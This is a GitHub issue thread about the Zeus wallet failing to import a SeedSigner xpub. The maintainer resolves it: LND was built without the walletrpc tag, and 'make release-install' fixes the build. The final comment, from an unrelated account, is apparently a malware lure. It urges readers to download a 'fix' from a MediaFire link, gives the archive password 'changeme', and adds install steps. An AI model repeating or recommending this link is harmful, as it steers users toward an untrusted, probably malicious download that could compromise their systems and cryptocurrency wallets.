### ISSUE TITLE
Unable to import SeedSigner (Xpub/Zpub)

### ISSUE THREAD

**Issue by Retropex** [ZeusLN/zeus#2367]
### Describe the bug

Unable to import SeedSigner (Xpub/Zpub) in zeus v0.9.0 getting `Not Found`

![image](https://github.com/user-attachments/assets/78fdf583-42c2-4862-92f6-882137bfd395)

### Reproduce

1. connect Zeus to LND `v0.18.2-beta`
2. Create a Xpub with @SeedSigner
3. Import it in Zeus

### ZEUS version

v0.9.0

### Node interface

LND (REST)

### Network

Clearnet

### Device

iPhone 13 pro

### Device operating system

iOS 17.6.1

**Comment by Retropex** [comment]
The only particularity is that I'm running Bitcoin Knots but since he act like Core it shouldn't be a problem.

For the fields they are filled automatically since Zpub, master key fingerprint and the script type are provided in the seedsigner qrcode

**Comment by kaloudis** [comment]
@Retropex are you building LND with custom tags? This error seems to indicate that it is being built without the `walletrpc` tag which is required to use the `ImportAccount` endpoint

See https://github.com/lightningnetwork/lnd/blob/master/docs/INSTALL.md#installing-lnd-from-source

**Comment by Retropex** [comment]
That's was the solution thanks!

To build I have used `make install` but this omit some tags, `make release-install` work fine.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
